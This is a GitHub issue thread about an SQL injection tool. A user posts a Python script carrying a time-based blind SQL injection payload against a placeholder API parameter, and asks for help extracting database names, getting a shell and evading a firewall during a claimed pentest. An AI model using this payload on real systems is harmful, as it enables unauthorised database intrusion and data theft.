How to force to use get methord??? #120
Labels
enhancement
New feature or request
Comments
|
Currently no support for method forcing so closing this now and later on will reopen once I am free to implement this |
|
And how about the fetching database name??
Why it exploit and still cant fetching database name or anything.
…On Sat, 30 Dec 2023, 10:59 Nasir Khan, ***@***.***> wrote:
Currently no support for method forcing so closing this now and later on
will reopen once I am free to implement this
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF65HA5W4PTBU3UVBPJDYL7CW7AVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ3TQMJQG4>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
|
The reasons could be firewall, payload not available in payloads list or a false positive. You should always confirm manually and try find a way to exploit manually then you can use sql-shell to automate your queries |
|
I also use the sql shell but nothing happen check this
…On Sat, 30 Dec 2023, 11:10 Nasir Khan, ***@***.***> wrote:
The reasons could be firewall, payload not available in payloads list or a
false positive. You should always confirm manually and try find a way to
exploit manually then you can use sql-shell to automate your queries
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF67IGI2D5JO4O3TGCILYL7EAFAVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ4DAMBRGA>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
|
And i confirm the target is vulnerable by writting a script and the target
is sleep in time i give but can you help me either to use this my script to
get database name!? And shell or anything or to evade firewall??
This is my script
import requests
import time
url = "https://target.com/api/games/markets" payload =
"""(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/"""
parameters = {'games': payload, 'markets': "46%2C52-2.5%2C43"}
start_time = time.time()
response = requests.get(url, params=parameters) end_time =
time.time()
if end_time - start_time > 6:
print("The server is vulnerable to time-based SQL injection.")
else: print("The
server is not vulnerable to time-based SQL injection.")
…On Sat, 30 Dec 2023, 11:15 rajabu daimu, ***@***.***> wrote:
I also use the sql shell but nothing happen check this
On Sat, 30 Dec 2023, 11:10 Nasir Khan, ***@***.***> wrote:
> The reasons could be firewall, payload not available in payloads list or
> a false positive. You should always confirm manually and try find a way to
> exploit manually then you can use sql-shell to automate your queries
>
> —
> Reply to this email directly, view it on GitHub
> <#120 (comment)>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/A3AIF67IGI2D5JO4O3TGCILYL7EAFAVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ4DAMBRGA>
> .
> You are receiving this because you authored the thread.Message ID:
> ***@***.***>
>
|
|
Is this sort of pentest or a bug bounty target? |
|
Pentest!
…On Sat, 30 Dec 2023, 11:28 Nasir Khan, ***@***.***> wrote:
Is this sort of pentest or a bug bounty target?
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF6YOFL4HSLFH2G536G3YL7GBDAVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ4DENBZGY>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
|
Email me: |
|
Thanks bro.
Will waiting for your reply
…On Sat, 30 Dec 2023, 15:50 Nasir Khan, ***@***.***> wrote:
Email me: ***@***.*** I will check and let you know of the
results
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF67IA6BJX6P5AACEQK3YMAEZ7AVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGUZDEMRRGY>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
|
Uts have been a long now am just waiting for your help
…On Sun, 31 Dec 2023, 22:48 rajabu daimu, ***@***.***> wrote:
Hey am still waiting for your help bro
On Sat, 30 Dec 2023, 18:55 rajabu daimu, ***@***.***> wrote:
> Thanks bro.
> Will waiting for your reply
>
> On Sat, 30 Dec 2023, 15:50 Nasir Khan, ***@***.***> wrote:
>
>> Email me: ***@***.*** I will check and let you know of the
>> results
>>
>> —
>> Reply to this email directly, view it on GitHub
>> <#120 (comment)>,
>> or unsubscribe
>> <https://github.com/notifications/unsubscribe-auth/A3AIF67IA6BJX6P5AACEQK3YMAEZ7AVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGUZDEMRRGY>
>> .
>> You are receiving this because you authored the thread.Message ID:
>> ***@***.***>
>>
>
|
|
i was waiting for your email and i didn't received one, how am i suppose to help in such case? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
Describe the solution you'd like
A clear and concise description of what you want to happen.
Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.
Additional context
Add any other context or screenshots about the feature request here.
The text was updated successfully, but these errors were encountered: